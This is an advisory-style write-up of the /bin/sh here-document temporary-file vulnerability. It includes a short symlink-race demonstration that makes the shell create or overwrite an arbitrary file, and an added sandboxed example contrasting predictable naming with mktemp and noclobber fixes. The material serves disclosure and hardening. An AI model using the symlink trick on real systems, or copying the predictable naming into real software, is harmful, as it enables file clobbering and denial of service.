COMMAND

    /bin/sh

SYSTEMS AFFECTED

    most unices

PROBLEM

    Paul Szabo found the following.  Similarly to the recently
    discussed tcsh vulnerability, the Bourne shell /bin/sh also
    creates temporary files in an insecure way, and can be exploited
    to create arbitrary files or to overwrite existing ones.  For
    tcsh see:

        http://oliver.efri.hr/~crv/security/bugs/mUNIXes/tcsh2.html

    While this vulnerability can be exploited for a denial-of-service
    attack, it is not clear how to use it to gain additional
    privileges.

    Demonstration:

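        #!/bin/sh -x
        # Show the target before the here-document is processed.
        ls -l /tmp/nologin
        # Put a symlink at the temp-file name sh will use: /tmp/sh<pid>0.
        ln -s /tmp/nologin /tmp/sh$$0
        # The here-document makes sh create its temporary file.
        cat <<EOF
        Only root can create /etc/nologin.
        Do any boot-time scripts use sh?
        EOF
        # Show the target again afterwards.
        ls -l /tmp/nologin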

SOLUTION

    FreeBSD does not seem to do this.
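
    For comparison, the sketch below is an added example, not code from
    the advisory or from any shell's source.  It contrasts the predictable
    sh<pid>0 naming seen in the demonstration with two exclusive-creation
    alternatives, inside a private sandbox directory.  The function names,
    the PID 4242 and all paths are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the advisory). Everything runs inside a private
# sandbox directory; the PID 4242 and all paths are constructed.

# Predictable name plus a plain ">" open, following the sh<pid>0 pattern from
# the demonstration. The open follows a symlink already sitting at that name.
unsafe_create() {
    f="$1/sh${2}0"
    : > "$f" && printf '%s\n' "$f"
}

# Hardened form 1: mktemp picks an unpredictable name and creates it
# exclusively, so an existing file or symlink is never reused.
safe_create() {
    mktemp "$1/sh.XXXXXX"
}

# Hardened form 2: if the name has to stay fixed, noclobber (set -C) makes the
# shell refuse to overwrite an existing regular file or to create a file
# through a dangling symlink.
exclusive_create() {
    f="$1/sh${2}0"
    ( set -C; : > "$f" ) 2>/dev/null && printf '%s\n' "$f"
}

# Plant a symlink at the predictable name, create the temp file with the
# chosen method, and report whether the symlink target came into existence.
demo() {
    box=$(mktemp -d) || return 1
    ln -s "$box/target" "$box/sh42420"
    case $1 in
        unsafe)    unsafe_create "$box" 4242 >/dev/null || : ;;
        safe)      safe_create "$box" >/dev/null || : ;;
        exclusive) exclusive_create "$box" 4242 >/dev/null || : ;;
    esac
    if [ -e "$box/target" ]; then r=target_created; else r=target_untouched; fi
    rm -rf "$box"
    printf '%s\n' "$r"
}

for m in unsafe safe exclusive; do
    printf '%-9s %s\n' "$m" "$(demo "$m")"
done
```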